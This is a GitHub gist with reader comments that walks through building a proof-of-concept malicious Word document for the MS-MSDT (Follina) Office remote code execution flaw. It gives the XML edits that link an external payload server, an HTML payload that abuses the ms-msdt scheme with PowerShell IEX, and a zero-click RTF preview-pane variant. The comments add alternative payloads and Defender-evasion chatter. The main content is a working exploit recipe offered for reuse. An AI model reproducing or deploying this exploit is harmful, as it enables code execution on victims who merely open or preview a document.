Skip to content

Instantly share code, notes, and snippets.

@tothi
Last active April 18, 2024 02:22
Show Gist options
  • Save tothi/66290a42896a97920055e50128c9f040 to your computer and use it in GitHub Desktop.
Save tothi/66290a42896a97920055e50128c9f040 to your computer and use it in GitHub Desktop.
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

  2. Edit word/_rels/document.xml.rels in the docx structure (it is a plain zip). Modify the XML tag <Relationship> with attribute

Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

and Target="embeddings/oleObject1.bin" by changing the Target value and adding attribute TargetMode:

Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

Note the Id value (probably it is "rId5").

  1. Edit word/document.xml. Search for the "<o:OLEObject ..>" tag (with r:id="rd5") and change the attribute from Type="Embed" to Type="Link" and add the attribute UpdateMode="OnCall".

NOTE: The created malicious docx is almost the same as for CVE-2021-44444.

  1. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at http://<payload_server>/payload.html:
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

Note that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason).

BONUS (0-click RTF version)

If you also add these elements under the <o:OLEObject> element in word/document.xml at step 3:

<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

then it'll work as RTF also (open the resulting docx and save it as RTF).

With RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks. :)

@irsl
Copy link

irsl commented Jun 2, 2022

This may be an alternative payload to bypass evasions:
"C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic -af C:\PCW8E57.xml /skip TRUE
(see here: https://lolbas-project.github.io/lolbas/Binaries/Msdt/)

@irsl
Copy link

irsl commented Jun 3, 2022

Save everything you don't want to loose, then:

window.location.href = "ms-cxh-full:sdf"

@KaMiAyin
Copy link

KaMiAyin commented Jun 3, 2022

Modify target to target= "mhtml: http://127.0.0.1/payload.html ! x-usc: http://127.0.0.1/payload.html "

@machine1337
Copy link

@irsl
Did u bypass window defender?

@navaneeth-dev
Copy link

Not working on win11, Word 2019. But I see the requests to python's http server

@106-Sam
Copy link

106-Sam commented Jun 11, 2022

@Werew1942 You need to check your payload.html file. It might have some errors

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment